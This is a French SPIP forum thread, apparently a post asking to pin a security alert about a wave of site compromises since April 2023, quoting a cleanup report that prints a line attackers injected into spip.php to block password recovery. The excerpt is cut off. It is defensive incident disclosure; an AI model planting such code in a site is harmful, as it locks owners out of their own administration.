Discuter de SPIP

pas d'acces à l'admin

RealET Mai 14, 2023, 8:16 9

Épingler ce post que j’ai fait hier ?

Alerte : vague de piratage de sites depuis le 23 avril 2023 : pas d’accès à /ecrire (version SPIP inférieures à 3.2.18, 4.1.8 et 4.2.1) Général

Bonjour, Je viens de nettoyer en profondeur un site (SPIP 3.1.6) qui avait été hacké par la faille corrigée par : Mise à jour critique de sécurité : sortie de SPIP 4.2.1, SPIP 4.1.8, SPIP (…) - SPIP Blog ( SPIP 4.2.1, SPIP 4.1.8, SPIP 4.0.10 et SPIP 3.2.18) J’ai trouvé 4 fichiers modifiés ou ajoutés : /spip.php La première ligne du fichier est modifiée ainsi : <?php if(isset($_POST['page'])&& strtolower($_POST['page'])=='spip_pass') die();?><?php Ce qui empêche d’utiliser la procédure d’…

afficher la publication dans le sujet

Accueil
Catégories
Lignes directrices
Conditions générales d'utilisation
Politique de confidentialité

Optimisé par Discourse, le rendu est meilleur quand JavaScript est activé.